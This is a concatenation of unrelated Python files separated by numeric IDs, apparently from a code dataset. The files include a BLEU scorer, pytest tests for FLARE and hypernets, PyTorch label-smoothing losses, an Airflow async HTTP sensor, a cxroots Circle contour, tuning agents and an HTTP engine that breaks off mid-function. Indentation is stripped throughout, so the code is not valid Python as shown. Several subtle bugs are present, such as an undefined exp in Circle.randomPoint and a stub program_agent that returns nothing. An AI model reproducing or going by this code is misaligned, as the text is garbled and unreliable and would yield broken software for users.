class BLEUCalculator():
def __init__(self,
smooth_method="floor", smooth_value=0.01,
lowercase=False, use_effective_order=True,
lang="en"):
self.smooth_method = smooth_method
self.smooth_value = smooth_value
self.lowercase = lowercase
self.use_effective_order = use_effective_order
if isinstance(lang, str):
self.lang = lang
self._lang = get_lang(lang)
elif isinstance(lang, BaseLang):
self.lang = lang.lang
self._lang = lang
self._tokenizer = DEFAULT_TOKENIZER
if self.lang == "ja":
def tokenizer_ja(text):
words = self._lang.tokenize_with_preprocess(text)
return " ".join(words)
TOKENIZERS["ja"] = tokenizer_ja
self._tokenizer = "ja"
elif self.lang == "zh":
self._tokenizer = "zh"
def bleu(self, summary, references, score_only=True):
"""
Calculate BLEU score by sacrebleu.
Parameters
----------
summary: str
summary text
references: str or str[]
reference or references to evaluate summary
score_only: bool
when True, return only score
See Also
--------
https://github.com/mjpost/sacreBLEU
"""
if isinstance(summary, str):
_s = summary
_refs = references
if isinstance(references, list):
_s = [_s]
_refs = [references]
bleu = corpus_bleu(
_s, _refs,
smooth_method=self.smooth_method,
smooth_value=self.smooth_value,
force=False, lowercase=self.lowercase,
tokenize=self._tokenizer,
use_effective_order=self.use_effective_order)
else:
_s = " ".join(summary)
_refs = [[" ".join(r) for r in references]]
# already tokenized summary and references
bleu = corpus_bleu(
_s, _refs,
smooth_method=self.smooth_method,
smooth_value=self.smooth_value,
force=True, lowercase=self.lowercase,
tokenize="none",
use_effective_order=self.use_effective_order)
if score_only:
return bleu.score
else:
return bleu
|
1709595
|
from masonite.mail import Mailable
class __class__(Mailable):
def build(self):
return (
self.to("<EMAIL>")
.subject("Masonite 4")
.from_("<EMAIL>")
.text("Hello from Masonite!")
.html("<h1>Hello from Masonite!</h1>")
)
|
1709619
|
import dask.dataframe as dd
from hypernets.tabular import sklearn_ex as skex, dask_ex as dex, get_tool_box
from hypernets.tabular.cache import cache, CacheCallback
from hypernets.tabular.datasets import dsutils
from hypernets.utils import Counter
class CacheCounter(CacheCallback):
def __init__(self):
super(CacheCounter, self).__init__()
self.enter_counter = Counter()
self.apply_counter = Counter()
self.store_counter = Counter()
def on_enter(self, fn, *args, **kwargs):
self.enter_counter()
def on_apply(self, fn, cached_data, *args, **kwargs):
self.apply_counter()
def on_store(self, fn, cached_data, *args, **kwargs):
self.store_counter()
def reset(self):
self.enter_counter.reset()
self.apply_counter.reset()
self.store_counter.reset()
class CachedMultiLabelEncoder(skex.MultiLabelEncoder):
@cache(attr_keys='columns', attrs_to_restore='columns,encoders')
def fit_transform(self, X, *args):
return super().fit_transform(X, *args)
@cache(attr_keys='columns', attrs_to_restore='columns,encoders')
def fit_transform_as_tuple_result(self, X, *args):
Xt = super().fit_transform(X.copy(), *args)
return X, Xt
class CachedDaskMultiLabelEncoder(dex.MultiLabelEncoder):
cache_counter = CacheCounter()
@cache(attr_keys='columns',
attrs_to_restore='columns,dtype,categorical_columns_,non_categorical_columns_,categories_',
callbacks=cache_counter)
def fit_transform(self, X, *args):
return super().fit_transform(X, *args)
@cache(attr_keys='columns',
attrs_to_restore='columns,dtype,categorical_columns_,non_categorical_columns_,categories_',
callbacks=cache_counter)
def fit_transform_as_array(self, X, *args):
X = super().fit_transform(X, *args)
return X.to_dask_array(lengths=True)
def test_cache():
df = dsutils.load_bank()
t = skex.MultiLabelEncoder()
X = t.fit_transform(df.copy())
t1 = CachedMultiLabelEncoder()
X1 = t1.fit_transform(df.copy())
t2 = CachedMultiLabelEncoder()
X2 = t2.fit_transform(df.copy())
hasher = get_tool_box(df).data_hasher()
assert hasher(X) == hasher(X1) == hasher(X2)
t3 = CachedMultiLabelEncoder()
X3 = t3.fit_transform_as_tuple_result(df.copy())
t4 = CachedMultiLabelEncoder()
X4 = t4.fit_transform_as_tuple_result(df.copy())
assert isinstance(X3, (tuple, list))
assert isinstance(X4, (tuple, list))
assert hasher(X3[1]) == hasher(X4[1])
def test_cache_dask():
cache_counter = CachedDaskMultiLabelEncoder.cache_counter
df = dd.from_pandas(dsutils.load_bank(), npartitions=2)
t = dex.MultiLabelEncoder()
X = t.fit_transform(df.copy())
cache_counter.reset()
t1 = CachedDaskMultiLabelEncoder()
X1 = t1.fit_transform(df.copy())
t2 = CachedDaskMultiLabelEncoder()
X2 = t2.fit_transform(df.copy())
hasher = get_tool_box(df).data_hasher()
assert hasher(X) == hasher(X1) == hasher(X2)
assert cache_counter.enter_counter.value == 2
assert cache_counter.apply_counter.value <= 2
assert cache_counter.store_counter.value <= 2
assert cache_counter.apply_counter.value + cache_counter.store_counter.value == 2
cache_counter.reset()
t3 = CachedDaskMultiLabelEncoder()
X3 = t3.fit_transform_as_array(df.copy())
t4 = CachedDaskMultiLabelEncoder()
X4 = t4.fit_transform_as_array(df.copy())
assert hasher(X3) == hasher(X4)
assert cache_counter.enter_counter.value == 2
assert cache_counter.apply_counter.value <= 2
assert cache_counter.store_counter.value <= 2
assert cache_counter.apply_counter.value + cache_counter.store_counter.value == 2
|
1709651
|
from CGATReport.Tracker import *
class SpeciesCount(TrackerSQL):
def __call__(self, track, slice=None):
'''
return the number of reference genomes that
are aligned to
'''
genomes = self.execute(
"""SELECT count(*) FROM species_present_fa""").fetchone()[0]
return {"total_reference_genomes": genomes}
class Species(TrackerSQL):
def __call__(self, track, slice=None):
'''
return the number of reference genomes that
are aligned to
'''
return self.getAll("""SELECT * FROM species_present_fa""")
class KnownAlignments(TrackerSQL):
def __call__(self, track, slice=None):
'''
return picard stats results
'''
result = {}
for data in self.execute("""SELECT track, PCT_PF_READS_ALIGNED FROM known_genomes_picard_stats_alignment_summary_metrics"""):
result[data[0]] = data[1]
return result
|
1709677
|
import pytest
import numpy as np
from pytest import raises
from flare.struc import Structure
from flare.utils.parameter_helper import ParameterHelper
from flare.parameters import Parameters
def test_initialization():
"""
simplest senario
"""
pm = ParameterHelper(
kernels=["twobody", "threebody"],
parameters={
"twobody": [1, 0.5],
"threebody": [1, 0.5],
"cutoff_twobody": 2,
"cutoff_threebody": 1,
"noise": 0.05,
},
verbose="DEBUG",
)
hm = pm.as_dict()
Parameters.check_instantiation(hm["hyps"], hm["cutoffs"], hm["kernels"], hm)
@pytest.mark.parametrize("ones", [True, False])
def test_initialization2(ones):
"""
check ones, random
"""
pm = ParameterHelper(
kernels=["twobody", "threebody"],
parameters={"cutoff_twobody": 2, "cutoff_threebody": 1, "noise": 0.05},
ones=ones,
random=not ones,
verbose="DEBUG",
)
hm = pm.as_dict()
Parameters.check_instantiation(hm["hyps"], hm["cutoffs"], hm["kernels"], hm)
@pytest.mark.parametrize("ones", [True, False])
def test_initialization_allsep(ones):
"""
check ones, random
"""
specie_list = ["C", "H", "O"]
pm = ParameterHelper(
species=specie_list,
kernels=["twobody", "threebody"],
parameters={"cutoff_twobody": 2, "cutoff_threebody": 1, "noise": 0.05},
allseparate=True,
ones=ones,
random=not ones,
verbose="DEBUG",
)
hm = pm.as_dict()
Parameters.check_instantiation(hm["hyps"], hm["cutoffs"], hm["kernels"], hm)
name_list = []
for i in range(3):
name = pm.find_group("specie", specie_list[i])
assert name not in name_list
name_list += [name]
name_list = []
for i in range(3):
for j in range(i, 3):
name = pm.find_group("twobody", [specie_list[i], specie_list[j]])
assert name not in name_list
name_list += [name]
with raises(RuntimeError):
pm = ParameterHelper(
species=[],
kernels=["twobody", "threebody"],
parameters={"cutoff_twobody": 2, "cutoff_threebody": 1, "noise": 0.05},
allseparate=True,
ones=ones,
random=not ones,
)
def test_initialization3():
"""check group definition"""
pm = ParameterHelper(
species=["O", "C", "H"],
kernels={
"twobody": [["*", "*"], ["O", "O"]],
"threebody": [["*", "*", "*"], ["O", "O", "O"]],
},
parameters={
"twobody0": [1, 0.5],
"twobody1": [2, 0.2],
"threebody0": [1, 0.5],
"threebody1": [2, 0.2],
"cutoff_twobody": 2,
"cutoff_threebody": 1,
},
verbose="DEBUG",
)
hm = pm.as_dict()
Parameters.check_instantiation(hm["hyps"], hm["cutoffs"], hm["kernels"], hm)
def test_initialization4():
"""check cut3b"""
pm = ParameterHelper(
species=["O", "C", "H"],
kernels={
"twobody": [["*", "*"], ["O", "O"]],
"threebody": [["*", "*", "*"], ["O", "O", "O"]],
},
cutoff_groups={"cut3b": [["*", "*"], ["O", "O"]]},
parameters={
"twobody0": [1, 0.5],
"twobody1": [2, 0.2],
"threebody0": [1, 0.5],
"threebody1": [2, 0.2],
"cut3b0": 5,
"cutoff_twobody": 2,
},
verbose="DEBUG",
)
hm = pm.as_dict()
Parameters.check_instantiation(hm["hyps"], hm["cutoffs"], hm["kernels"], hm)
def test_initialization5():
"""check universal"""
pm = ParameterHelper(
species=["O", "C", "H"],
kernels={
"twobody": [["*", "*"], ["O", "O"]],
"threebody": [["*", "*", "*"], ["O", "O", "O"]],
},
parameters={
"sigma": 1,
"lengthscale": 0.5,
"cutoff_threebody": 3,
"cutoff_twobody": 2,
},
verbose="DEBUG",
)
hm = pm.as_dict()
Parameters.check_instantiation(hm["hyps"], hm["cutoffs"], hm["kernels"], hm)
pm = ParameterHelper(
kernels=["twobody", "threebody"],
parameters={
"sigma": 1.0,
"lengthscale": 0.5,
"cutoff_twobody": 2,
"cutoff_threebody": 1,
"noise": 0.05,
},
verbose="DEBUG",
)
hm = pm.as_dict()
Parameters.check_instantiation(hm["hyps"], hm["cutoffs"], hm["kernels"], hm)
def test_generate_by_line():
pm = ParameterHelper(verbose="DEBUG")
pm.define_group("specie", "O", ["O"])
pm.define_group("specie", "C", ["C"])
pm.define_group("specie", "H", ["H"])
pm.define_group("twobody", "**", ["C", "H"])
pm.define_group("twobody", "OO", ["O", "O"], atomic_str=True)
pm.define_group("threebody", "***", ["O", "O", "C"])
pm.define_group("threebody", "OOO", ["O", "O", "O"])
pm.define_group("manybody", "1.5", ["C", "H"])
pm.define_group("manybody", "1.5", ["C", "O"])
pm.define_group("manybody", "1.5", ["O", "H"])
pm.define_group("manybody", "2", ["O", "O"])
pm.define_group("manybody", "2", ["H", "O"])
pm.define_group("manybody", "2.8", ["O", "O"])
pm.set_parameters("**", [1, 0.5])
pm.set_parameters("OO", [1, 0.5])
pm.set_parameters("***", [1, 0.5])
pm.set_parameters("OOO", [1, 0.5])
pm.set_parameters("1.5", [1, 0.5, 1.5])
pm.set_parameters("2", [1, 0.5, 2])
pm.set_parameters("2.8", [1, 0.5, 2.8])
pm.set_constraints("2", [True, False])
pm.set_constraints("2.8", False)
pm.set_parameters("cutoff_twobody", 5)
pm.set_parameters("cutoff_threebody", 4)
pm.set_parameters("cutoff_manybody", 3)
hm = pm.as_dict()
Parameters.check_instantiation(hm["hyps"], hm["cutoffs"], hm["kernels"], hm)
def test_generate_by_line2():
pm = ParameterHelper(verbose="DEBUG")
pm.define_group("specie", "O", ["O"])
pm.define_group("specie", "rest", ["C", "H"])
pm.define_group("twobody", "**", ["*", "*"])
pm.define_group("twobody", "OO", ["O", "O"])
pm.define_group("threebody", "***", ["*", "*", "*"])
pm.define_group("threebody", "Oall", ["O", "O", "O"])
pm.set_parameters("**", [1, 0.5])
pm.set_parameters("OO", [1, 0.5])
pm.set_parameters("Oall", [1, 0.5])
pm.set_parameters("***", [1, 0.5])
pm.set_parameters("cutoff_twobody", 5)
pm.set_parameters("cutoff_threebody", 4)
hm = pm.as_dict()
Parameters.check_instantiation(hm["hyps"], hm["cutoffs"], hm["kernels"], hm)
def test_generate_by_list():
pm = ParameterHelper(verbose="DEBUG")
pm.list_groups("specie", ["O", ["C", "N"], "H"])
pm.list_groups("twobody", [["*", "*"], ["O", "O"]])
pm.list_groups("threebody", [["*", "*", "*"], ["O", "O", "O"]])
pm.list_parameters(
{
"twobody0": [1, 0.5],
"twobody1": [2, 0.2],
"threebody0": [1, 0.5],
"threebody1": [2, 0.2],
"cutoff_twobody": 2,
"cutoff_threebody": 1,
}
)
hm = pm.as_dict()
Parameters.check_instantiation(hm["hyps"], hm["cutoffs"], hm["kernels"], hm)
def test_generate_by_list2():
pm = ParameterHelper(verbose="DEBUG")
pm.list_groups("specie", {"s1": "O", "s2": ["C", "N"], "s3": "H"})
pm.list_groups("twobody", {"t0": ["*", "*"], "t1": [["s1", "s1"], ["s1", "s3"]]})
pm.list_groups("threebody", [["*", "*", "*"], ["s1", "s1", "s1"]])
pm.list_parameters(
{
"t0": [1, 0.5],
"t1": [2, 0.2],
"threebody0": [1, 0.5],
"threebody1": [2, 0.2],
"cutoff_twobody": 2,
"cutoff_threebody": 1,
}
)
hm = pm.as_dict()
Parameters.check_instantiation(hm["hyps"], hm["cutoffs"], hm["kernels"], hm)
def test_generate_by_list_error():
pm = ParameterHelper(verbose="DEBUG")
pm.list_groups("specie", ["O", ["C", "N"], "H"])
with raises(RuntimeError):
pm.list_groups("specie", ["O", "C", "H"])
pm = ParameterHelper(verbose="DEBUG")
with raises(RuntimeError):
pm.list_groups("specie", "O")
pm = ParameterHelper(verbose="DEBUG")
with raises(RuntimeError):
pm.list_groups("specie", "O")
def test_opt():
pm = ParameterHelper(
species=["O", "C", "H"],
kernels={
"twobody": [["*", "*"], ["O", "O"]],
"threebody": [["*", "*", "*"], ["O", "O", "O"]],
},
parameters={
"twobody0": [1, 0.5, 1],
"twobody1": [2, 0.2, 2],
"threebody0": [1, 0.5],
"threebody1": [2, 0.2],
"cutoff_twobody": 2,
"cutoff_threebody": 1,
},
constraints={"twobody0": [False, True]},
verbose="DEBUG",
)
hm = pm.as_dict()
Parameters.check_instantiation(hm["hyps"], hm["cutoffs"], hm["kernels"], hm)
def test_from_dict():
pm = ParameterHelper(
species=["O", "C", "H"],
kernels=["twobody", "threebody"],
allseparate=True,
random=True,
parameters={"cutoff_twobody": 7, "cutoff_threebody": 4.5, "cutoff_manybody": 3},
verbose="debug",
)
hm = pm.as_dict()
Parameters.check_instantiation(hm["hyps"], hm["cutoffs"], hm["kernels"], hm)
pm1 = ParameterHelper.from_dict(hm, verbose="debug", init_spec=["O", "C", "H"])
hm1 = pm1.as_dict()
Parameters.compare_dict(hm, hm1)
def test_constraints1():
"""
simplest senario
"""
pm = ParameterHelper(
species=["O", "C", "H"],
kernels={
"twobody": [["*", "*"], ["O", "O"]],
"threebody": [["*", "*", "*"], ["O", "O", "O"]],
},
parameters={
"twobody0": [1, 0.5],
"twobody1": [2, 0.2],
"threebody0": [1, 0.5],
"threebody1": [2, 0.2],
"cutoff_twobody": 2,
"cutoff_threebody": 1,
},
constraints={
"twobody0": [True, False],
"threebody0": [False, True],
"noise": False,
},
verbose="DEBUG",
)
hm = pm.as_dict()
Parameters.check_instantiation(hm["hyps"], hm["cutoffs"], hm["kernels"], hm)
assert hm["train_noise"] is False
hyps = hm["hyps"]
assert len(hyps) == 6
assert hyps[0] == 1
assert hyps[1] == 2
assert hyps[2] == 0.2
assert hyps[3] == 2
assert hyps[4] == 0.5
assert hyps[5] == 0.2
def test_constraints2():
"""
simplest senario
"""
pm = ParameterHelper(
kernels=["twobody", "threebody"],
parameters={
"twobody": [1, 0.5],
"threebody": [1, 0.5],
"cutoff_twobody": 2,
"cutoff_threebody": 1,
"noise": 0.05,
},
constraints={"twobody": [True, False]},
verbose="DEBUG",
)
hm = pm.as_dict()
Parameters.check_instantiation(hm["hyps"], hm["cutoffs"], hm["kernels"], hm)
hyps = hm["hyps"]
assert hyps[0] == 1
assert hyps[1] == 1
def test_check_one_conflict():
"""
simplest senario
"""
with raises(RuntimeError):
pm = ParameterHelper(
kernels=["twobody", "threebody"],
parameters={"cutoff_twobody": 2, "cutoff_threebody": 1, "noise": 0.05},
ones=True,
random=True,
verbose="DEBUG",
)
with raises(RuntimeError):
pm = ParameterHelper(
kernels=["twobody", "threebody"],
parameters={
"sigma": 0.5,
"lengthscale": 1.0,
"cutoff_twobody": 2,
"cutoff_threebody": 1,
"noise": 0.05,
},
ones=True,
random=False,
verbose="DEBUG",
)
|
1709727
|
import pathlib
import pytest
from dotenv import load_dotenv
from app import create_app
from app.models import model
def clean_users():
# removing users will remove everything
# since all data linked into it
users = model.get_all("user")
for user in users:
user_id = user["id"]
model.delete(table="user", field="id", value=user_id)
@pytest.fixture
def client():
current_path = pathlib.Path(__file__)
dotenv_path = current_path.parents[2].joinpath(".env.example")
load_dotenv(dotenv_path)
app = create_app()
client = app.test_client()
yield client
# teardown
clean_users()
|
1709749
|
import torch
from torch import nn
class LabelSmoothing(nn.Module):
def __init__(self, size, smoothing=0.0):
super(LabelSmoothing, self).__init__()
self.criterion = nn.KLDivLoss(reduction='mean')
self.Logsoftmax = nn.LogSoftmax(dim = 0)
self.confidence = 1.0 - smoothing
self.smoothing = smoothing
self.size = size
self.true_dist = None
def forward(self, x, target):
assert x.size(1) == self.size
x = self.Logsoftmax(x)
true_dist = x.data.clone()
true_dist.fill_(self.smoothing / (self.size - 1))
true_dist.scatter_(1, target.data.unsqueeze(1), self.confidence)
self.true_dist = true_dist
true_dist.requires_grad = False
return self.criterion(x, true_dist)
def SmoothedLabel(true_labels, classes, smoothing=0.0):
"""
if smoothing == 0, it's one-hot method
if 0 < smoothing < 1, it's smooth method
"""
assert 0 <= smoothing < 1
confidence = 1.0 - smoothing
label_shape = torch.Size((true_labels.size(0), classes))
with torch.no_grad():
true_dist = torch.empty(size=label_shape, device=true_labels.device)
true_dist.fill_(smoothing / (classes - 1))
true_dist.scatter_(1, true_labels.data.unsqueeze(1), confidence)
return true_dist
class CrossEntropyLoss(nn.Module):
def __init__(self, classes, smooth):
super(CrossEntropyLoss, self).__init__()
self.classes = classes
self.smooth = smooth
def forward(self, pred, labels):
labels = SmoothedLabel(labels, self.classes, self.smooth)
pred = pred.log_softmax(-1)
return torch.mean(torch.sum(-labels * pred, dim = -1))
|
1709753
|
import io
from setuptools import setup, find_packages
def readme():
with io.open('README.md', encoding='utf-8') as f:
return f.read()
setup(
name="marketsimulator",
version="0.0.1",
author="<NAME> and <NAME>",
author_email='<EMAIL>',
license='MIT License',
description="Realistic market matching engine simulator \
for HFT trading strategies",
long_description_content_type="text/markdown",
url="https://github.com/Surbeivol/PythonMatchingEngine",
packages=find_packages(),
install_requires=[
'cycler==0.10.0',
'kiwisolver==1.1.0',
'matplotlib==3.1.0',
'numpy==1.16.4',
'pandas==0.24.2',
'pyparsing==2.4.0',
'python-dateutil==2.8.0',
'pytz==2019.1',
'PyYAML==5.4',
'six==1.12.0',
'tqdm==4.32.2'
],
include_package_data=True,
classifiers=[
"Programmin Language :: Python :: 3.6",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
)
|
1709754
|
import os
import json
import logging
import json
logging = logging.getLogger(__name__)
class ProjectSettings:
art_dir: str
assets_dir: str
ART_DIR = "art_dir"
ASSETS_DIR = "assets_dir"
PROJECT_ROOT_FILE_NAME = ".rafx_project"
def find_dir_containing_file_recursing_upwards(current_path, file_name):
if not os.path.isabs(current_path):
current_path = os.path.abspath(current_path)
if os.path.isfile(current_path):
dir_name = os.path.dirname(current_path)
return find_dir_containing_file_recursing_upwards(dir_name, file_name)
if os.path.isdir(current_path):
if os.path.exists(os.path.join(current_path, file_name)):
return current_path
else:
parent = os.path.dirname(current_path)
if parent == current_path:
return None
return find_dir_containing_file_recursing_upwards(parent, file_name)
def sanitize_path(root_path, path):
return os.path.join(root_path, path)
# current_path can be a file or directory, and can be absolute or relative
def find_project_settings(current_path) -> ProjectSettings:
project_root = find_dir_containing_file_recursing_upwards(current_path, PROJECT_ROOT_FILE_NAME)
if not project_root:
return None
project_file_path = os.path.join(project_root, PROJECT_ROOT_FILE_NAME)
project_settings_json_obj = None
with open(project_file_path, "r") as f:
try:
project_settings_json_obj = json.load(f)
except json.decoder.JSONDecodeError:
logging.error("Project file %s could not be parsed as json", project_file_path)
return None
project_settings = {
ART_DIR: sanitize_path(project_root, project_settings_json_obj[ART_DIR]),
ASSETS_DIR: sanitize_path(project_root, project_settings_json_obj[ASSETS_DIR])
}
logging.debug("Projects settings: %s", project_settings)
return project_settings
|
1709765
|
from spaceone.core.error import *
class ERROR_USER_STATUS_CHECK_FAILURE(ERROR_BASE):
_message = 'A user "{user_id}" status is not ENABLED.'
class ERROR_EXTERNAL_USER_NOT_ALLOWED_API_USER(ERROR_INVALID_ARGUMENT):
_message = 'External user cannot be created with the API_USER type.'
class ERROR_NOT_ALLOWED_EXTERNAL_AUTHENTICATION(ERROR_INVALID_ARGUMENT):
_message = 'This domain does not allow external authentication.'
class ERROR_TOO_MANY_USERS_IN_EXTERNAL_AUTH(ERROR_INVALID_ARGUMENT):
_message = 'There are two or more users in the external authentication system. (user_id = {user_id})'
class ERROR_NOT_FOUND_USER_IN_EXTERNAL_AUTH(ERROR_INVALID_ARGUMENT):
_message = 'The user could not be found in the external authentication system. (user_id = {user_id})'
class ERROR_INCORRECT_PASSWORD_FORMAT(ERROR_INVALID_ARGUMENT):
_message = 'The password format is incorrect. (rule = {rule})'
class ERROR_INCORRECT_USER_ID_FORMAT(ERROR_INVALID_ARGUMENT):
_message = 'The user id format is incorrect. (rule = {rule})'
|
1709778
|
from typing import Any, Dict, Optional
from airflow.providers.http.sensors.http import HttpSensor
from airflow.utils.context import Context
from astronomer.providers.http.triggers.http import HttpTrigger
class HttpSensorAsync(HttpSensor):
"""
Executes a HTTP GET statement and returns False on failure caused by
404 Not Found or `response_check` returning False.
.. note::
If ``response_check`` is passed, the sync version of the sensor will be used.
The response check can access the template context to the operator:
.. code-block:: python
def response_check(response, task_instance):
# The task_instance is injected, so you can pull data form xcom
# Other context variables such as dag, ds, execution_date are also available.
xcom_data = task_instance.xcom_pull(task_ids="pushing_task")
# In practice you would do something more sensible with this data..
print(xcom_data)
return True
HttpSensorAsync(task_id="my_http_sensor", ..., response_check=response_check)
:param http_conn_id: The Connection ID to run the sensor against
:type http_conn_id: str
:param method: The HTTP request method to use
:type method: str
:param endpoint: The relative part of the full url
:type endpoint: str
:param request_params: The parameters to be added to the GET url
:type request_params: a dictionary of string key/value pairs
:param headers: The HTTP headers to be added to the GET request
:type headers: a dictionary of string key/value pairs
:param response_check: A check against the 'requests' response object.
The callable takes the response object as the first positional argument
and optionally any number of keyword arguments available in the context dictionary.
It should return True for 'pass' and False otherwise.
:type response_check: A lambda or defined function.
:param extra_options: Extra options for the 'requests' library, see the
'requests' documentation (options to modify timeout, ssl, etc.)
:type extra_options: A dictionary of options, where key is string and value
depends on the option that's being modified.
"""
def execute(self, context: Context) -> None:
"""
Logic that the sensor uses to correctly identify which trigger to
execute, and defer execution as expected.
"""
# TODO: We can't currently serialize arbitrary function
# Maybe we set method_name as users function??? to run it again
# and evaluate the response.
if self.response_check:
super().execute(context=context)
else:
self.defer(
timeout=self.execution_timeout,
trigger=HttpTrigger(
method=self.hook.method, # TODO: Fix this to directly get method from ctor
endpoint=self.endpoint,
data=self.request_params,
headers=self.headers,
extra_options=self.extra_options,
),
method_name="execute_complete",
)
def execute_complete(self, context: Dict[str, Any], event: Optional[Dict[Any, Any]] = None) -> None:
"""
Callback for when the trigger fires - returns immediately.
Relies on trigger to throw an exception, otherwise it assumes execution was
successful.
"""
self.log.info("%s completed successfully.", self.task_id)
return None
|
1709797
|
from IPython.display import Latex, display
from nbconvert.filters.pandoc import convert_pandoc
def latex(text, color="", **kwargs):
"""print in latex"""
if color:
text = "\\textcolor{%s}{%s}" % (color, text)
return Latex(text + "\n", **kwargs)
def print(text, **kwargs):
"""wrapper around printing"""
if not isinstance(text, str):
display(text)
return
display(
latex(
convert_pandoc(
text + "\\newline", "markdown+tex_math_double_backslash", "latex"
),
**kwargs
)
)
def hr():
"""horizontal rule"""
return latex("\\noindent\\makebox[\\linewidth]{\\rule{\\paperwidth - 1cm}{0.4pt}}")
def newpage():
"""make a new page. in html, this just does a horizontal rule"""
return latex("\\newpage")
def table(df, title="", footnote=""):
"""helper to display a table"""
return latex(
"\\begin{center} "
"\\begin{threeparttable}"
"\\caption{" + title + "}" + df.to_latex(escape=False) + "\\begin{tablenotes}"
"\\small"
"\\item " + footnote + "\\end{tablenotes}"
"\\end{threeparttable}"
"\\end{center}"
)
def pagenum():
"""display a page number (latex only)"""
return latex("\\thepage")
def _make(text, h_type):
return convert_pandoc(
"#" * h_type + " " + text + "\n", "markdown+tex_math_double_backslash", "latex"
)
def p(text, **kwargs):
return Latex(text, **kwargs)
def h1(text, **kwargs):
return Latex(_make(text, 1), **kwargs)
def h2(text, **kwargs):
return Latex(_make(text, 2), **kwargs)
def h3(text, **kwargs):
return Latex(_make(text, 3), **kwargs)
def h4(text, **kwargs):
return Latex(_make(text, 4), **kwargs)
def h5(text, **kwargs):
return Latex(_make(text, 5), **kwargs)
def grid(items_and_weights):
print(Latex("\n\\begin{Row}%\n"))
for val, width in items_and_weights:
print(Latex("\n\\begin{Cell}{" + str(width) + "}\n"))
if not isinstance(val, str):
print(Latex("\\vspace*{-.4cm}\n"))
print(val)
print(Latex("\n\n\\end{Cell}\n"))
print(Latex("\n\\end{Row}\n"))
|
1709822
|
from __future__ import division
import numpy as np
from numpy import pi
from ..Contour import Contour
from ..Paths import ComplexArc
from .Annulus import Annulus
class Circle(Contour):
"""
A positively oriented circle in the complex plane.
Parameters
----------
center : complex
The center of the circle.
radius : float
The radius of the circle.
Examples
--------
.. plot::
:include-source:
from cxroots import Circle
circle = Circle(center=1, radius=0.5)
circle.show()
"""
def __init__(self, center, radius):
self.center = center
self.radius = radius
self.axisName = ('r')
segments = [ComplexArc(center, radius, 0, 2*pi)]
super(Circle, self).__init__(segments)
def __str__(self):
return 'Circle: center={center.real:.3f}{center.imag:+.3f}i, radius={radius:.3f}'.format(center=self.center, radius=self.radius)
def contains(self, z):
""" Returns True if the point z lies within the contour, False if otherwise """
return abs(z - self.center) < self.radius
@property
def centralPoint(self):
return self.center
@property
def area(self):
return pi*self.radius**2
def subdivide(self, axis='r', divisionFactor=0.5):
"""
Subdivide the contour
Parameters
----------
axis : str, can only be 'r' (argument kept for consistency with 'subdivisions' method in parent Contour class)
The axis along which the line subdividing the contour is a constant.
divisionFactor : float in range (0,1), optional
Determines the point along 'axis' at which the line dividing the box is placed
Returns
-------
box1 : Annulus
With inner radius determined by the divisionFactor and outer radius equal to that of the original circle
box2 : Circle
With radius equal to the inner radius of box1
"""
if axis == 'r' or self.axisName[axis] == 'r':
box1 = Annulus(self.center, [self.radius*divisionFactor, self.radius])
box2 = Circle(self.center, self.radius*divisionFactor)
box1.segments[0] = self.segments[0]
box1.segments[1]._reversePath = box2.segments[0]
box2.segments[0]._reversePath = box1.segments[1]
for box in [box1, box2]:
box._createdBySubdivisionAxis = axis
box._parentBox = self
self._childBoxes = [box1, box2]
return box1, box2
def randomPoint(self):
""" Returns a random point inside the Circle """
r = np.random.uniform(0,self.radius)
phi = np.random.uniform(0,2*pi)
return r*exp(1j*phi) + self.center
|
1709832
|
import manta_lab as ml
from manta_lab.tuning.internal import FunctionAgent, ProgramAgent
logger = None
class AgentError(Exception):
pass
def program_agent(api, tune_id, function, entity=None, project=None, count=None):
ProgramAgent
return
def function_agent(api, tune_id, function, entity=None, project=None, count=None):
"""Generic agent entrypoint, used for CLI or jupyter.
Arguments:
tune_id (dict): Sweep ID generated by CLI or tune API
function (func, optional): A function to call instead of the "program"
entity (str, optional): MantaLab Entity
project (str, optional): MantaLab Project
count (int, optional): the number of trials to run.
"""
if not callable(function):
raise Exception("function paramter must be callable!")
agent = FunctionAgent(
api=api,
tune_id=tune_id,
function=function,
entity=entity,
project=project,
count=count,
logger=logger,
)
agent.run()
def agent(tune_id, function=None, entity=None, project=None, count=None):
"""
Generic agent entrypoint.
Will run a function or program with configuration parameters.
"""
kwargs = locals()
global _INSTANCES
_INSTANCES += 1
try:
# make sure we are logged in
api = ml.api.MantaAPI()
if function:
return function_agent(api=api, **kwargs)
in_jupyter = not ml.util.ensure_python()
return program_agent(api=api, in_jupyter=in_jupyter, **kwargs)
finally:
_INSTANCES -= 1
_INSTANCES = 0
def is_running():
return bool(_INSTANCES)
|
1709864
|
import json
import socket
from typing import Optional, Any, Mapping, Callable, Type, Tuple
import requests
from urlobject import URLObject
from urlobject.path import URLPath
from .common import translate_dict_func
def get_host_ip() -> Optional[str]:
s = None
try:
# s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# s.connect(('8.8.8.8', 80))
# ip = s.getsockname()[0]
myname = socket.getfqdn(socket.gethostname())
ip = socket.gethostbyname(myname)
finally:
if s is not None:
s.close()
return ip
_DEFAULT_HTTP_PORT = 80
_DEFAULT_HTTPS_PORT = 443
def split_http_address(address: str, default_port: Optional[int] = None) -> Tuple[str, int, bool, str]:
_url = URLObject(address)
_host = _url.hostname
_https = (_url.scheme.lower()) == 'https'
_port = _url.port or default_port or (_DEFAULT_HTTPS_PORT if _https else _DEFAULT_HTTP_PORT)
_path = str(_url.path) or ''
return _host, _port, _https, _path
class HttpEngine:
def __init__(self, host: str, port: int, https: bool = False, path: str = None):
self.__base_url = URLObject().with_scheme('https' if https else 'http') \
.with_hostname(host).with_port(port).add_path(path or '')
self.__session = requests.session()
# noinspection PyMethodMayBeStatic
def _data_process(self, data: Optional[Mapping[str, Any]] = None) -> Mapping[str, Any]:
return data or {}
# noinspection PyMethodMayBeStatic
def _base_headers(self) -> Mapping[str, None]:
return {}
def get_url(self, path: str = None):
original_segments = self.__base_url.path.segments
path_segments = URLPath().add(path or '').segments
return str(self.__base_url.with_path(URLPath.join_segments(original_segments + path_segments)))
def request(
self,
method: str,
path: str,
data: Optional[Mapping[str, Any]] = None,
headers: Optional[Mapping[str, Any]] = None,
params: Optional[Mapping[str, Any]] = None,
raise_for_status: bool = True,
) -> requests.Response:
_headers = dict(self._base_headers())
_headers.update(headers or {})
response = self.__session.request(
method=method,
url=self.get_url(path),
data=json.dumps(self._data_process(data) or {}),
headers=_headers or {},
params=params or {},
)
if raise_for_status:
